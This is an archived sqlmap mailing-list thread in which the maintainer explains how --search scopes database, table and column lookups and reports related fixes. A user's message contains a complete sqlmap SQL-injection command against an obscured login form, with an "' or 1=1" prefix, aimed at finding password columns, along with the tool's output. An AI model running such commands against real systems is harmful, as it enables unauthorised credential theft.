i think use --sql-shell is better, sqlmap is become bigger and bigger.
On Sat, Dec 3, 2011 at 2:06 AM, Miroslav Stampar <miroslav.stam...@gmail.com
> wrote:
> Hi again.
>
> With the r4565 --seach support should be fixed for Oracle (like in your
> case).
>
> Kind regards,
> Miroslav Stampar
>
>
> On Fri, Dec 2, 2011 at 6:34 PM, Miroslav Stampar <
> miroslav.stam...@gmail.com> wrote:
>
>> This is a Oracle specific problem. Have to see how to properly deal with
>> it.
>>
>> Kind regards
>>
>>
>> 2011/12/2 CoeTs7 <t...@hotmail.com>
>>
>>> hi,
>>> thx for you reply, but it doesn't seen to work that way on my box:
>>> # proxychains svn checkout
>>> https://svn.sqlmap.org/sqlmap/trunk/sqlmapsqlmap-dev 2>/dev/null
>>> ProxyChains-3.1 (http://proxychains.sf.net)
>>> Checked out revision 4564.
>>> #./sqlmap.py -u 'http://xx.cfm' --data "xx=2&vLoginName=kahao" -p
>>> vLoginName --technique b --text-only --suffix " -- s" --prefix="' or 1=1 "
>>> --string "<b>" --timeout 100 --proxy 'http://192.168.1.12:8080' --search
>>> -D 'GVDBA' -C 'PASSWORD'
>>> ........omit..........
>>> do you want sqlmap to consider provided column(s):
>>> [1] as LIKE column names (default)
>>> [2] as exact column names
>>> >
>>> [06:29:01] [INFO] searching columns like 'PASSWORD'
>>> [06:29:01] [INFO] fetching number of tables containing columns like
>>> 'PASSWORD' in database 'USERS'
>>>
>>> i delete ./output/xxx.com and try this again, but it still run this
>>> way. anything wrong with my operation?
>>>
>>> ------------------------------
>>> Date: Fri, 2 Dec 2011 14:27:35 +0100
>>> Subject: Re: [sqlmap-users] how to search for column name in a specific
>>> database using '--search' ?
>>> From: miroslav.stam...@gmail.com
>>> To: t...@hotmail.com
>>> CC: sqlmap-users@lists.sourceforge.net
>>>
>>> Hi.
>>>
>>> First of all you can't use '%PASSWORD%' if you want to search for
>>> identifiers LIKE 'PASSWORD'. In your case just put: -D authdb --search
>>> -C PASSWORD.
>>>
>>> With the last commit (r4563) there is an upgrade in --search mechanism
>>> that will more suite your needs.
>>>
>>> Now the lowest denominator dictates what is going to be searched. So:
>>> --search -D .. -T .. -C .. will search for column(s)
>>> --search -D .. -C .. will search for column(s)
>>> --search -D .. -T .. will search for table(s)
>>> --search -D .. will search for db(s)
>>> ...
>>>
>>> Kind regards,
>>> Miroslav Stampar
>>>
>>> On Fri, Dec 2, 2011 at 1:50 PM, Miroslav Stampar <
>>> miroslav.stam...@gmail.com> wrote:
>>>
>>> Hi.
>>>
>>> You are right. The lowest common denominator should be searched for with
>>> --search (in this case that's column). Going to modify it and report back.
>>>
>>> Kind regards,
>>> Miroslav Stampar
>>>
>>> 2011/12/2 CoeTs7 <t...@hotmail.com>
>>>
>>> hi all. i'm wondering if there's a way to search for column name in a
>>> specific database while using '--search' ?
>>> i've tried '-D authdb --search -C "%PASSWORD%"' but sqlmap think that
>>> i'm trying to search a database named "authdb" and a column named like
>>> 'password' . I am sure that the password i want to know is in the database
>>> 'authdb' so i don't want to waste time searching in other dbs.
>>> Is there any way i can do this?
>>> thx a lot.
>>>
>>>
>>> ------------------------------------------------------------------------------
>>> All the data continuously generated in your IT infrastructure
>>> contains a definitive record of customers, application performance,
>>> security threats, fraudulent activity, and more. Splunk takes this
>>> data and makes sense of it. IT sense. And common sense.
>>> http://p.sf.net/sfu/splunk-novd2d
>>> _______________________________________________
>>> sqlmap-users mailing list
>>> sqlmap-users@lists.sourceforge.net
>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>
>>>
>>>
>>>
>>> --
>>> Miroslav Stampar
>>> http://about.me/stamparm
>>>
>>>
>>>
>>>
>>> --
>>> Miroslav Stampar
>>> http://about.me/stamparm
>>>
>>
>>
>>
>> --
>> Miroslav Stampar
>> http://about.me/stamparm
>>
>
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm
>
>
> ------------------------------------------------------------------------------
> All the data continuously generated in your IT infrastructure
> contains a definitive record of customers, application performance,
> security threats, fraudulent activity, and more. Splunk takes this
> data and makes sense of it. IT sense. And common sense.
> http://p.sf.net/sfu/splunk-novd2d
> _______________________________________________
> sqlmap-users mailing list
> sqlmap-users@lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>
--
zhouzhen
http:// <http://zhouzhenster.blogspot.com>www.6code.net
------------------------------------------------------------------------------
All the data continuously generated in your IT infrastructure
contains a definitive record of customers, application performance,
security threats, fraudulent activity, and more. Splunk takes this
data and makes sense of it. IT sense. And common sense.
http://p.sf.net/sfu/splunk-novd2d
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
